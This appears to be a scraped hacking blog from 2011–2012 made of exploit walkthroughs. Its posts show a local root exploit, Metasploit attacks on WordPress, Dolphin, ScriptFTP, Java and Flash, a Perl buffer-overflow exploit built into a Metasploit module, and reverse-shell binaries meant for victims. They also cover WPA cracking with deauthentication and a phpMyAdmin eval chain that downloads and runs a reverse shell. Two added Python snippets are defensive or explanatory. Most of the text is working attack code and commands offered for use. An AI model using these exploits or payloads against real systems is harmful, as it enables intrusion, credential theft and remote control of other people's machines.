09:18:29 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]<br />
[+] Attached to 17426<br />
[+] Waiting for signal<br />
[+] Signal caught<br />
[+] Shellcode placed at 0x4001189d<br />
[+] Now wait for suid shell...<br />
id<br />
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)<br />
<br />
<br />
Success !! We got root on the box.<br />
In the next video I will demonstrate how to hack using Samba.<br />
<br />
WordPress 1 Flash Gallery Plugin Arbitrary File Upload Vulnerability - Angelo, 2012-06-01<br />
<iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/0BTt1ERGcL4" width="420"></iframe><br />
<br />
<br />
WordPress 1 Flash Gallery Plugin Arbitrary File Upload Vulnerability<br />
Secunia Advisory SA45930 <br />
Release Date 2011-09-08<br />
The vulnerability is caused due to the wp-content/plugins/1-flash-gallery/upload.php script (when "action" is set to "uploadify" and "fileext" is set to e.g. "php") improperly verifying uploaded files. This can be exploited to execute arbitrary PHP code by uploading a PHP file. The vulnerability is confirmed in version 1.5.6. Prior versions may also be affected.<br />
<br />
Download the exploit from http://www.exploit-db.com/exploits/17801/<br />
Copy to /pentest/exploits/framework3/modules/exploits/multi/http<br />
<br />
Fix the payload /pentest/exploits/framework3/modules/payloads/singles/php/reverse_php.rb as I explained in my video.<br />
<br />
msfconsole<br />
use multi/http/flash_galery_wordpress<br />
set RHOST 172.16.1.70<br />
set URI /wordpress<br />
set PAYLOAD php/reverse_php_airwolf<br />
set LHOST 172.16.1.79<br />
exploit<br />
<br />
And that's it, thank you guys for watching it.<br />
<br />
About posts in this blog - 2012-03-26<br />
Hi everyone, I am writing this post to help you guys help me.<br />
I have posted stuff on LFI, RFI, SQL injection, exploits, how to write exploits, how to use some tools, so I am not sure what else I can post. Should I post more exploits for RFI, LFI, SQL injection, etc.?<br />
The way to exploit is "always" the same; the only thing that changes is the software being exploited. What do you guys think? Should I repeat posts for the same thing (LFI, RFI, etc.) on different products?<br />
<br />
CMS Mini 0.2.2 Local File Inclusion Vulnerabilities - Angelo, 2011-10-20<div>
<div>
<iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/tJMzXgnBUjM" width="420"></iframe><br />
<br />
CMS Mini 0.2.2 Multiple Local File Inclusion Vulnerabilities</div>
<div>
<br />
Hi everyone, this is a really quick post, just to show an LFI in CMS Mini 0.2.2</div>
<br />
Just access this URL, add some ../../../../ and the file you want to look at; don't forget to change the IP address to your server.<br />
<br />
<div>
<br />
<a href="http://172.16.1.70/cmsmini/admin/edit.php?name=../../../../../../../../../../../../etc/passwd">http://172.16.1.70/cmsmini/admin/edit.php?name=../../../../../../../../../../../../etc/passwd</a> </div>
<br />
<div>
I know, it's a boring post ;)</div>
<br />
<br />
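A server-side check of the kind that would stop the edit.php?name=... traversal above, as an added example (not CMS Mini's code): the requested name is percent-decoded, resolved against the real content root, and rejected unless the result still lies under that root. The content root and files are constructed in a temporary directory.

```python
"""Path-containment check that would stop the CMS Mini edit.php?name=... LFI above.

Added example, not CMS Mini's code. Directory and file names are constructed;
the check resolves the requested name and refuses anything outside the content root.
"""
import tempfile
from pathlib import Path
from urllib.parse import unquote


class PathTraversal(ValueError):
    """Raised when a requested name escapes the content root."""


def resolve_under_root(root: str, name: str) -> Path:
    """Return the real path of root/name, or raise PathTraversal.

    Steps: decode percent-encoding (so %2e%2e is seen as '..'), reject NUL bytes,
    empty and absolute names, join to the root, resolve symlinks and '..', then
    require the result to still be inside the real root. Checking the *resolved*
    path is what makes the number of '../' segments irrelevant.
    """
    decoded = unquote(name)
    if not decoded or "\x00" in decoded or Path(decoded).is_absolute():
        raise PathTraversal(name)
    root_real = Path(root).resolve()
    target = (root_real / decoded).resolve()
    try:
        target.relative_to(root_real)
    except ValueError:
        raise PathTraversal(name) from None
    return target


def check_samples() -> dict:
    """Exercise the check against a constructed content root; returns {name: accepted?}."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "cmsmini" / "content"
        root.mkdir(parents=True)
        (root / "home.txt").write_text("hello")
        samples = [
            "home.txt",                                          # legitimate page
            "../../../../../../../../../../../../etc/passwd",   # the payload from the post
            "..%2F..%2Fetc%2Fpasswd",                            # same idea, percent-encoded
            "/etc/passwd",                                       # absolute path
            "sub/../home.txt",                                   # '..' that stays inside the root
        ]
        for name in samples:
            try:
                resolve_under_root(str(root), name)
                results[name] = True
            except PathTraversal:
                results[name] = False
    return results


if __name__ == "__main__":
    for name, ok in check_samples().items():
        print("allowed " if ok else "BLOCKED ", name)
```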
<div>
</div>
</div>
<br />
Dolphin 7.0.7 "eval()" PHP Code Execution Vulnerability - Angelo, 2011-10-20<div align="justify">
<iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/nOsnRgORfvM" width="420"></iframe><br />
<br />
Dolphin "eval()" PHP Code Execution Vulnerability<br />
<br />
Secunia Advisory SA46457<br />
Release Date 2011-10-19<br />
URL http://secunia.com/advisories/46457/<br />
Exploit URL : http://www.exploit-db.com/exploits/17994/<br />
Description: A vulnerability has been discovered in Dolphin, which can be exploited by malicious users to compromise a vulnerable system. Input passed via the "bubbles" parameter to member_menu_queries.php (when "action" is set to "get_bubbles_values") is not properly sanitised before being used in an "eval()" call. This can be exploited to execute arbitrary PHP code.</div>
<br />
<br />
<div align="justify">
The vulnerability is confirmed in version 7.0.7. Other versions may also be affected.<br />
<br />
----<br />
<br />
Hi everyone, so, this is just a quick post to show the Dolphin 7.0.7 exploit. This is how you test it:<br />
1) Download the application from http://www.4shared.com/file/HTsuoYry/Dolphin-v707.html<br />
2) Install it<br />
3) Download the exploit<br />
4) Run the exploit in the format: php dolphin707.php 172.16.1.70 /dolphin/ user pass<br />
Remember to change the IP to match yours.<br />
5) You got your shell<br />
<br />
This is what it looks like:<br />
root@bt:~/exploits# php dolphin707.php 172.16.1.70 /dolphin/ admin hacktest<br />
<br />
+------------------------------------------------------------+<br />
| Dolphin <= 7.0.7 Remote PHP Code Injection Exploit by EgiX |<br />
+------------------------------------------------------------+<br />
<br />
dolphin-shell# id<br />
uid=48(apache) gid=48(apache) groups=48(apache)<br />
<br />
Thanks for watching. </div>
<br />
10k visits - Angelo, 2011-10-18<br />
I just want to say thank you all for visiting my blog, I just reached 10k visits and I am really pleased !!<br />
<br />
Twitter - Angelo, 2011-10-13<br />
Hi everyone, after a 1 week battle with Twitter, I finally got my account up and running. I got banned since day one because they thought that I was managing loads of accounts, yeah, right.. well, anyway, now you guys can follow me on Twitter at <a href="http://twitter.com/#%21/pochackblog">#pochackblog</a><br />
<br />
Thank you all.<br />
<br />
AmmSoft ScriptFTP 'GETLIST' or 'GETFILE' Commands Remote Buffer Overflow Vulnerability - Angelo, 2011-10-09<br />
<iframe allowfullscreen="" frameborder="0" height="349" src="http://www.youtube.com/embed/hjtB8rIeyfI?hl=en&fs=1" width="425"></iframe><br />
<br />
AmmSoft ScriptFTP 'GETLIST' or 'GETFILE' Commands Remote Buffer Overflow Vulnerability<br />
Class: Boundary Condition Error<br />
CVE: <br />
Remote: Yes<br />
Local: No<br />
Published: Sep 20 2011 12:00AM<br />
Updated: Sep 30 2011 07:00AM<br />
Credit: Tom Gregory<br />
Vulnerable: AmmSoft ScriptFTP 3.3<br />
URL : http://www.securityfocus.com/bid/49707<br />
Description : ScriptFTP is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the application. Failed attacks may cause a denial-of-service condition. ScriptFTP 3.3 is vulnerable; other versions may also be affected. <br />
<br />
In order to exploit this you can use either the Python or the Metasploit exploit; I prefer the Metasploit one because of the payloads. So the first thing you need to do is put the exploit under the folder /pentest/exploits/framework3/modules/exploits/windows (I called mine scriptftp33.rb); just paste in the content of<br />
http://www.securityfocus.com/data/vulnerabilities/exploits/49707.rb<br />
<br />
Now step by step<br />
1) msfconsole<br />
2) use windows/ftp/scriptftp33 ( To use the exploit that we just created)<br />
3) set PAYLOAD windows/meterpreter/bind_tcp (To use meterpreter as our payload)<br />
4) set RHOST 172.16.1.7 (This is the ip address of the server that I am attacking)<br />
5) exploit<br />
<br />
Ok, now the attacking server side is ready to go; you need to download ScriptFTP from<br />
http://www.scriptftp.com/ScriptFTP_3_3_setup.exe and install it.<br />
Open ScriptFTP and create a script with the following content:<br />
<br />
OPENHOST("172.16.1.79","ftptest","passwordtest")<br />
SETPASSIVE(ENABLED)<br />
GETLIST($list,REMOTE_FILES)<br />
CLOSEHOST<br />
<br />
<br />
172.16.1.79 = The IP address of the attacking server.<br />
ftptest = username<br />
passwordtest = password<br />
Remember to create this user on your attacking server.<br />
Save it as exploit.ftp<br />
Now click Open and select exploit.ftp<br />
If everything goes all right, in your Metasploit you should now see something like this:<br />
msf exploit(scriptftp33) > [*] 172.16.1.7:1518 LOGIN ftptest / passwordtest<br />
[*] - Data connection set up<br />
[*] - Sending directory list via data connection<br />
[*] Sending stage (752128 bytes) to 172.16.1.7<br />
[*] Meterpreter session 1 opened (172.16.1.79:37594 -> 172.16.1.7:4444) at 2011-09-30 10:15:21 +0100<br />
<br />
Right, now you have your meterpreter session; just type "sessions -i 1" and you can do everything you want ;)<br />
<br />
That's it guys.<br />
<br />
From fuzzing to creating an exploit - 2011-10-09<br />
<iframe allowfullscreen="" frameborder="0" height="349" src="http://www.youtube.com/embed/d8KXoTFRwJ8?hl=en&fs=1" width="425"></iframe><br />
<br />
Hi everyone, this is a complex post, but I will do my best to explain the bits and pieces, with some URLs that you guys can read to understand everything I am trying to explain a bit better. I did this a few weeks ago, and I think it's interesting to post what I have done, so you guys can understand a bit better how things are made and how hackers get to the point of creating an exploit. I will not go really deep into the explanations because then the post would become really boring and no one would watch it, so let's see if I get some of you that are curious about the subject to watch the video until the end.<br />
The first thing you will need is a vulnerable server; there is a project created by "lupin" that you can download and run your own tests against, so please download vulnserver from this URL.<br />
<br />
http://grey-corner.blogspot.com/2010/12/introducing-vulnserver.html<br />
And download the OLLYDBG from:<br />
http://www.ollydbg.de/<br />
<br />
You will find the download link in the bottom of the webpage.<br />
Please, do not run this on a production server as it MAY crash the server; it never happened to me.. but who knows ;)<br />
Before you read the post, I recommend that you read the following wikis.<br />
<br />
EIP = http://en.wikipedia.org/wiki/Instruction_pointer<br />
Buffer overflow = http://en.wikipedia.org/wiki/Buffer_overflow<br />
SEH = http://en.wikipedia.org/wiki/Structured_Exception_Handling#Structured_Exception_Handling<br />
FUZZ Testing = http://en.wikipedia.org/wiki/Fuzz_testing<br />
nops = http://forum.hitb.org/viewtopic.php?f=1&t=17925<br />
<br />
<br />
Ok, let's do this; below is the step by step of what you will need to do.<br />
<br />
1) Launch the server (vulnserver.exe), which will open port 9999<br />
2) Now open up a shell in your Backtrack and run telnet 172.16.1.7 9999, then HELP<br />
3) This is the list of commands that may or may not have problems:<br />
STATS [stat_value]<br />
RTIME [rtime_value]<br />
LTIME [ltime_value]<br />
SRUN [srun_value]<br />
TRUN [trun_value]<br />
GMON [gmon_value]<br />
GDOG [gdog_value]<br />
KSTET [kstet_value]<br />
GTER [gter_value]<br />
HTER [hter_value]<br />
LTER [lter_value]<br />
KSTAN [lstan_value]<br />
<br />
<br />
4) Play a bit, typing commands like "STATS COMMAND"; it will return "STATS VALUE NORMAL",<br />
or "TRUN COMMAND"; it will return "TRUN COMPLETE".<br />
<br />
5) Now, in your Backtrack, go to /pentest/fuzzers/spike/src and type ". ld.sh"; this will fix a bug in Backtrack that prevents us from doing the next step.<br />
<br />
6) There is a command called generic_send_tcp that we will use to send our junk to the server.<br />
You will need to create a script called stats.spk with the following content:<br />
s_readline(); //this will read the banner that the server is sending to us<br />
s_string("STATS ");<br />
s_string_variable("COMMAND");<br />
<br />
Now, you save it and run it.<br />
./generic_send_tcp 172.16.1.7 9999 ./stats.spk 0 0 <br />
172.16.1.7 = The server that is running vulnserver.exe<br />
What we are doing here is testing the server for that specific command, STATS; generic_send_tcp will send a lot of random junk to the server and try to crash it.<br />
<br />
As you can see, the application did not crash, which means that the STATS command does not contain any buffer overflow problem. Let's try another command, TRUN.<br />
<br />
Create the script trun.spk <br />
s_readline(); //this will read the banner that the server is sending to us<br />
s_string("TRUN ");<br />
s_string_variable("COMMAND");<br />
<br />
Save it and run.<br />
./generic_send_tcp 172.16.1.7 9999 ./trun.spk 0 0 <br />
As you can see, now the application crashed.<br />
Now you have to find out:<br />
1) What caused it to crash<br />
2) How many bytes it took to crash it, because we want to find the EIP value.<br />
<br />
In order to do that, we need to run Wireshark in the background to capture the packets, so we can do some further analysis.<br />
With Wireshark running, run generic_send_tcp again against the TRUN command.<br />
Ok, it crashed again; you can stop Wireshark and apply the filter tcp.port==9999 so it shows only what matters to us.<br />
Now you need to click on Follow TCP Stream until you find a lot of AAAAAAA; those were generated by generic_send_tcp. You can tell this is the one we are looking for because after the AAAA there is no proper connection close, meaning that the server crashed.<br />
<br />
Now, save it as crash.txt (only what you sent to the server, that's 5009 bytes).<br />
You should ask yourself now: how many bytes did it take to make the application crash?<br />
<br />
With the command "wc -m crash.txt" you will find that out.<br />
The output is 5009 crash.txt, but if you remove "TRUN /.:/" from the beginning, that is equal to 5000.<br />
<br />
Create a file called exploit1.pl with the follow content:<br />
#!/usr/bin/perl<br />
use IO::Socket;<br />
$header = "TRUN /.:/";<br />
$junk="\x41" x 5000; #That is 5000xA , we are sending 5000 bytes to the server.<br />
$socket = IO::Socket::INET->new(<br />
Proto => "tcp",<br />
PeerAddr => "$ARGV[0]",<br />
PeerPort => "$ARGV[1]",<br />
);<br />
$socket->recv($serverdata, 1024);<br />
print $serverdata;<br />
$socket->send($header.$junk);<br />
<br />
Save it and give it execute permission: chmod +x exploit1.pl<br />
Now execute ./exploit1.pl 172.16.1.7 9999<br />
As expected, the application crashed again. Now we need to create a pattern of 5000 bytes; to do that, type the command:<br />
<br />
/pentest/exploits/framework3/tools/pattern_create.rb 5000<br />
<br />
Now create an exploit2.pl with EXACTLY the same content, except for $junk: instead of "\x41" x 5000, insert the pattern that you just created.<br />
<br />
Save it and give it execute permission. Before you execute it this time, open up OllyDbg and attach vulnserver.exe (File > Attach).<br />
Click the Play button and now execute the exploit again.<br />
<br />
./exploit2.pl 172.16.1.7 9999<br />
<br />
<br />
You will see that the application crashed with the message : "Don't know how to continue because memory at address 386F4337 is not readable. Try to change the EIP or pass exception to program" <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYfmCKXw4MqeoSwipUEGI_wPH_lTy_zKb-3SYWxasO5DINVNb62954nTtUoLSCQhUCwQtdTPRKhUMK8clkyzDm0fcE0ve-JgAahpPwu7C9GjaRFKmuQxlMzWbQDahRAkFhdtF4aXtY80s/s1600/eip.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYfmCKXw4MqeoSwipUEGI_wPH_lTy_zKb-3SYWxasO5DINVNb62954nTtUoLSCQhUCwQtdTPRKhUMK8clkyzDm0fcE0ve-JgAahpPwu7C9GjaRFKmuQxlMzWbQDahRAkFhdtF4aXtY80s/s320/eip.JPG" width="320" /></a></div>
<br />
<br />
<br />
Ok, bingo!! That's what we want: that address 386F4337 is our EIP, and if you are running on Windows XP SP3 you should get the same EIP!<br />
<br />
Now you need to look up that value in the pattern; to do that, type in your Backtrack:<br />
<br />
/pentest/exploits/framework3/tools/pattern_offset.rb 0x386F4337 5000<br />
The output is 2003<br />
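As an added example (not the author's code), here is a Python re-implementation of the cyclic-pattern idea behind pattern_create.rb and pattern_offset.rb, so the numbers above (a 5000-byte pattern, EIP reading 0x386F4337, offset 2003) can be reproduced and understood; only the crash value comes from the post, everything else is constructed for the demo.<br />

```python
"""Added example (not from the original post): a re-implementation of the
cyclic-pattern technique used by pattern_create.rb / pattern_offset.rb,
reproducing the crash-triage step of the post: a 5000-byte pattern, EIP
showing 0x386F4337, and the resulting offset of 2003.  Only the crash
value 0x386F4337 is taken from the post; the rest is constructed."""
import string
import struct


def pattern_create(length: int) -> bytes:
    """Build the Metasploit-style pattern Aa0Aa1Aa2...Aa9Ab0Ab1...

    Each 3-byte group is (uppercase, lowercase, digit), so within the
    first 26 * 26 * 10 * 3 = 20280 bytes every 4-byte window is unique
    and therefore identifies its own position in the buffer.
    """
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(register_value: int, length: int = 5000) -> int:
    """Locate a crash register value inside the pattern.

    The debugger prints EIP as a number (0x386F4337), but the four bytes
    that landed in the saved return address were written to the stack in
    little-endian order, so the bytes to search for are the value packed
    with '<I' (b"7Co8" here).  Returns -1 when the value is not pattern
    data, i.e. EIP was not overwritten by our input at all.
    """
    needle = struct.pack("<I", register_value)
    return pattern_create(length).find(needle)


def has_unique_windows(pattern: bytes, width: int = 4) -> bool:
    """Sanity check: every `width`-byte window occurs only once, so the
    offset reported by pattern_offset() is unambiguous."""
    seen = set()
    for i in range(len(pattern) - width + 1):
        window = pattern[i:i + width]
        if window in seen:
            return False
        seen.add(window)
    return True


if __name__ == "__main__":
    crash_eip = 0x386F4337            # value shown by OllyDbg in the post
    offset = pattern_offset(crash_eip, 5000)
    print(f"pattern bytes found in EIP: {struct.pack('<I', crash_eip)!r}")
    print(f"offset to the saved return address: {offset}")   # 2003
    print(f"4-byte windows unique: {has_unique_windows(pattern_create(5000))}")
```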
<br />
Now you need to overwrite EIP with the address of a jmp esp instruction; that is the basic stack overflow technique. You can run msfpescan against a DLL that ships with the software, in this case essfunc.dll:<br />
<br />
msfpescan -j esp essfunc.dll <br />
and you will get something like this:<br />
[essfunc.dll]<br />
0x625011af jmp esp<br />
0x625011bb jmp esp<br />
0x625011c7 jmp esp<br />
0x625011d3 jmp esp<br />
0x625011df jmp esp<br />
0x625011eb jmp esp<br />
0x625011f7 jmp esp<br />
0x62501203 jmp esp<br />
0x62501205 jmp esp<br />
<br />
<br />
Take the first one (0x625011af).<br />
As we are working on an Intel (little-endian) system, the address has to be packed in reverse byte order in our $eip variable:<br />
$eip=pack('V',0x625011af); # 'V' = 32-bit unsigned little-endian, i.e. the bytes reversed<br />
<br />
Now you need a payload: the program you want to launch on the target, such as calc.exe or cmd.exe. msfpayload generates it and msfencode turns it into a format you can paste into the script.<br />
The possibilities are endless; here are some examples of what you can do.<br />
To open calc.exe:<br />
/pentest/exploits/framework3/msfpayload windows/exec CMD=calc EXITFUNC=seh R | /pentest/exploits/framework3/msfencode -t perl -e x86/alpha_upper<br />
<br />
To bind a command prompt to port 4444:<br />
msfpayload windows/shell_bind_tcp lport=4444 exitfunc=process R | msfencode -t perl -e x86/alpha_upper<br />
<br />
In the next script I put all of the above together, using shell_bind_tcp; let's call it exploit3.pl:<br />
<br />
#!/usr/bin/perl<br />
use IO::Socket;<br />
$header = "TRUN /.:/";<br />
$junk="\x41" x 2003;<br />
$eip=pack('V',0x625011af);<br />
$nop="\x90" x 20;<br />
$shellcode = ""; # paste the msfencode -t perl output of the shell_bind_tcp command above (the encoded payload bytes are omitted here)<br />
<br />
$socket = IO::Socket::INET->new(<br />
Proto => "tcp",<br />
PeerAddr => "$ARGV[0]",<br />
PeerPort => "$ARGV[1]",<br />
);<br />
$socket->recv($serverdata, 1024);<br />
print $serverdata;<br />
$socket->send($header.$junk.$eip.$nop.$shellcode);<br />
<br />
<br />
Save it, give it execute permission and run it.<br />
If everything goes according to plan, after running the exploit you should be able to telnet to the server on port 4444 and get a shell. Let's try it:<br />
<br />
root@bt:~# ./vulnserv_shell.pl 172.16.1.7 9999<br />
Welcome to Vulnerable Server! Enter HELP for help.<br />
root@bt:~# telnet 172.16.1.7 4444<br />
Trying 172.16.1.7...<br />
Connected to 172.16.1.7.<br />
Escape character is '^]'.<br />
Microsoft Windows XP [Version 5.1.2600]<br />
(C) Copyright 1985-2001 Microsoft Corp.<br />
<br />
C:\temp><br />
<br />
<br />
And we have our shell!!! Great.<br />
Now you can convert your Perl exploit into a Metasploit module.<br />
Create a file called vulnserver.rb under /pentest/exploits/framework3/modules/exploits/windows/misc/ with the following content:<br />
<br />
<br />
require 'msf/core'<br />
<br />
class Metasploit3 < Msf::Exploit::Remote<br />
Rank = ExcellentRanking<br />
include Msf::Exploit::Remote::Tcp<br />
def initialize(info={})<br />
super(update_info(info,<br />
'Name' => 'Vuln server',<br />
'Description' => %q{<br />
Angelo test.<br />
},<br />
'Author' => 'Angelo' ,<br />
'Version' => '$Revision: 13646 1$',<br />
'Platform' => 'win',<br />
'Payload' =><br />
{<br />
'BadChars' => "\x00\x0d\x20\xad",<br />
},<br />
'Targets' =><br />
[<br />
[ 'Windows XP SP3',{'Ret'=> 0x625011af,}],<br />
],<br />
'DefaultTarget' => 0,<br />
))<br />
register_options([ Opt::RPORT(9999)],self.class)<br />
<br />
<br />
end<br />
<br />
def exploit<br />
connect<br />
<br />
header = "TRUN /.:/"<br />
junk = make_nops(2003)<br />
eip = [target.ret].pack('V')<br />
nops = make_nops(20)<br />
<br />
sploit = header + junk + eip + nops + payload.encoded<br />
<br />
print_status("Trying #{target.name}...")<br />
<br />
sock.put(sploit)<br />
<br />
handler<br />
disconnect<br />
end<br />
<br />
end<br />
<br />
<br />
<br />
And now let's try the exploit from Metasploit:<br />
<br />
msf > use windows/misc/vulnserver<br />
msf exploit(vulnserver) > set RHOST 172.16.1.7<br />
RHOST => 172.16.1.7<br />
msf exploit(vulnserver) > set PAYLOAD windows/shell_bind_tcp<br />
PAYLOAD => windows/shell_bind_tcp<br />
msf exploit(vulnserver) > set EXITFUNC seh<br />
EXITFUNC => seh<br />
msf exploit(vulnserver) > exploit<br />
<br />
[*] Started bind handler<br />
[*] Trying Windows XP SP3...<br />
[*] Command shell session 1 opened (172.16.1.79:52672 -> 172.16.1.7:4444) at 2011-09-30 14:09:01 +0100<br />
<br />
Microsoft Windows XP [Version 5.1.2600]<br />
(C) Copyright 1985-2001 Microsoft Corp.<br />
<br />
C:\temp><br />
<br />
<br />
And there you go, it works from Metasploit as well.<br />
<br />
Phewwww, that was a long post, and I hope everyone enjoyed it.<br />
<br />
Thank you all.<br />
How to create a binary file with metasploit (posted 2011-09-30)<br />
This is a how-to for creating a binary file that will be sent to the victim: first create the binary with Metasploit, send it to the victim, then set up the handler to wait for the connection back.<br />
<br />
cd /pentest/exploits/framework3<br />
./msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.1.79 LPORT=8888 X > /var/www/exploits/reverse_shell_meterpreter.exe<br />
msfconsole<br />
use exploit/multi/handler<br />
set PAYLOAD windows/meterpreter/reverse_tcp<br />
set LHOST 172.16.1.79<br />
set LPORT 8888<br />
exploit<br />
<br />
Now your server is waiting for the client; when they open the file, you get a Meterpreter session on their computer.<br />
Quick how to crack a wireless network (posted 2011-09-30)<br />
Hello guys, this is a quick how-to for cracking a wireless network.<br />
<br />
1) airmon-ng (show interfaces)<br />
2) airmon-ng start wlan0 (put the card in monitor mode and allow it to do channel hopping)<br />
3) airodump-ng mon0 (this starts channel hopping and lists all access points)<br />
4) Ctrl+C<br />
5) Now choose the network you want to crack from the list, with the command:<br />
airodump-ng -c 10 --bssid 00:00:00:00:00:00 mon0 -w /root/wpa2crack<br />
Now it is capturing only that specific channel and access point.<br />
6) Now you need to capture the handshake. You have two options: wait for a client to reconnect, or disconnect a client with a deauth attack and force it to reconnect. To do that, type:<br />
7) aireplay-ng -0 1 -a (access point) 00:00:00:00:00:00 -c (client that I want to launch my attack against) 00:00:00:00:00:00 mon0<br />
8) If you look at the top right corner you will see WPA HANDSHAKE; then Ctrl+C.<br />
9) Crack it with: aircrack-ng /root/wpa2crack.cap -w /pentest/passwords/wordlist/dict.txt<br />
10) You should see your key. You can also use rainbow tables with John the Ripper.<br />
phpMyAdmin Prior to 3.3.10.2 and 3.4.3.1 Multiple Remote Vulnerabilities (posted 2011-08-05)<br />
<iframe allowfullscreen="" frameborder="0" height="295" src="http://www.youtube.com/embed/oIEd1T9bcAY?fs=1" width="480"></iframe><br />
<br />
phpMyAdmin Prior to 3.3.10.2 and 3.4.3.1 Multiple Remote Vulnerabilities<br />
Bugtraq ID: 48563<br />
Class: Input Validation Error<br />
CVE: CVE-2011-2505<br />
CVE-2011-2506<br />
CVE-2011-2507<br />
CVE-2011-2508<br />
Remote: Yes<br />
Local: No<br />
Published: Jul 05 2011 12:00AM<br />
Updated: Jul 26 2011 10:10PM <br />
URL : http://www.securityfocus.com/bid/48563/info<br />
<br />
Hello all, this post combines an old post of mine, "Deface using EVAL() function", with phpMyAdmin Prior to 3.3.10.2 and 3.4.3.1.<br />
phpMyAdmin is prone to multiple remote vulnerabilities, including PHP code-execution and local file-include vulnerabilities. Successful attacks can compromise the affected application and possibly the underlying computer. So, let's test that. We have 2 exploits available. With the first one, we make the eval option available so we can execute remote commands on the target machine.<br />
<br />
php exploit1.php http://172.16.1.18/phpmyadmin<br />
You should get something like this:<br />
[i] Running...<br />
[*] Contacting server to retrive session cookie and token.<br />
[i] Cookie:dkucqrelskbq2k8kd2ouive7rsb9t176<br />
[i] Token:64d4cd9570888c981c127bdf47586d65<br />
[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.<br />
[*] Contacting server to make it save the injected code to a file.<br />
[*] Contacting server to test if the injected code executes.<br />
[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!<br />
[+] Use your browser to execute PHP code like this <br />
<br />
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=echo%20'test';<br />
<br />
Great, that means it worked.<br />
Now we apply what I explained before about EVAL().<br />
Before you type all the commands, make sure your attacking server is ready for the reverse connection from the target machine. Type this on the attacking server:<br />
nc -l -p 8080 -vvv<br />
<br />
Ok, now let's go back to the browser and upload our shell to the server.<br />
<br />
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("ls -la /");<br />
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("cat /etc/passwd");<br />
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("wget -P /tmp http://172.16.1.79/exploits/airwolf_reverse_shell");<br />
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("chmod 777 /tmp/airwolf_reverse_shell");<br />
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("/tmp/airwolf_reverse_shell");<br />
<br />
After you request that last URL, go back to the attacking server's shell to see whether the target server connected back to you.<br />
listening on [any] 8080 ...<br />
172.16.1.18: inverse host lookup failed: Unknown server error : Connection timed out<br />
connect to [172.16.1.79] from (UNKNOWN) [172.16.1.18] 53365<br />
<br />
<br />
ls<br />
config.inc.php<br />
id<br />
uid=48(apache) gid=48(apache) groups=48(apache)<br />
<br />
Yeap, as you can see, we got our shell on the server.<br />
Have fun ;)<br />
JAVA CVE-2010-4452 (posted 2011-04-30)<br />
<iframe allowfullscreen="" frameborder="0" height="349" src="http://www.youtube.com/embed/znZHSfuVSb0" width="425"></iframe><br />
<br />
<br />
CVE: CVE-2010-4452<br />
Remote: Yes<br />
Local: No<br />
Published: Feb 15 2011 12:00AM<br />
Updated: Apr 19 2011 08:45PM <br />
Description: Oracle Java is prone to a remote code-execution vulnerability in the Java Runtime Environment. An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. This vulnerability affects the following supported versions: 6 Update 23 and lower.<br />
To exploit it you can use the following syntax in Metasploit:<br />
use windows/browser/java_codebase_trust<br />
set SRVHOST 192.168.1.69<br />
set SRVPORT 80<br />
set URIPATH /<br />
set PAYLOAD java/meterpreter/reverse_tcp<br />
set LHOST 192.168.1.69<br />
set LPORT 8888<br />
exploit<br />
Then open up the client browser and open the URL <a href="http://192.168.1.69/">http://192.168.1.69/</a><br />
You should get your shell!<br />
I tested on Windows XP and Windows 7, both worked fine, but it didn't work on Ubuntu.<br />
Adobe Flash Player CVE-2011-0611 'SWF' File Remote Memory Corruption Vulnerability (posted 2011-04-30)<br />
CVE-2011-0611<br />
Remote: Yes<br />
Local: No<br />
Published: Apr 11 2011 12:00AM<br />
Updated: Apr 21 2011 04:14PM <br />
Hello everyone, it's been a while since my last post. Sorry for the delay, lately I am really busy, but I will try to keep it up. Today I will do 3 posts: the first one is for Adobe Flash, the second for WebDAV and the last for Java!<br />
So, this Adobe exploit is just another one in the wild... there are so many that I decided to cover the latest one. No big fuss, just prepare the server in Metasploit and open the link on the client, so let's do this:<br />
1) Start msfconsole and type this (adjust to your IP address):<br />
use windows/browser/adobe_flashplayer_flash10o<br />
set PAYLOAD windows/meterpreter/reverse_tcp<br />
set LHOST 192.168.1.69<br />
set LPORT 8888<br />
set SRVHOST 192.168.1.69<br />
set SRVPORT 80<br />
set URIPATH /<br />
exploit<br />
[*] Exploit running as background job.<br />
[*] Started reverse handler on 192.168.1.69:8888<br />
[*] Using URL: 192.168.1.69:80<br />
[*] Server started.<br />
Now, open this URL in the client and you will get your shell.<br />
sessions -i 1<br />
Bear in mind that this link can be hidden inside a div or a frame, so a malicious link can be opened even if you don't click on anything.<br />
And that's it ;)<br />
DLL Hijacking (posted 2011-04-30)<br />
This vulnerability is triggered when a file of a vulnerable type is opened from the server that is hosting the files.<br />
Usually the user has to browse into the directory and open the file; this can be any file, even a blank one with nothing inside.<br />
The flaw is that the application launched to handle the file type will inadvertently load a DLL from the working directory, and then we get our shell. So let's do this one.<br />
<br />
1) open msfconsole<br />
msf> search webdav.dll<br />
msf> use windows/browser/webdav_dll_hijacker<br />
msf> set PAYLOAD windows/meterpreter/reverse_tcp<br />
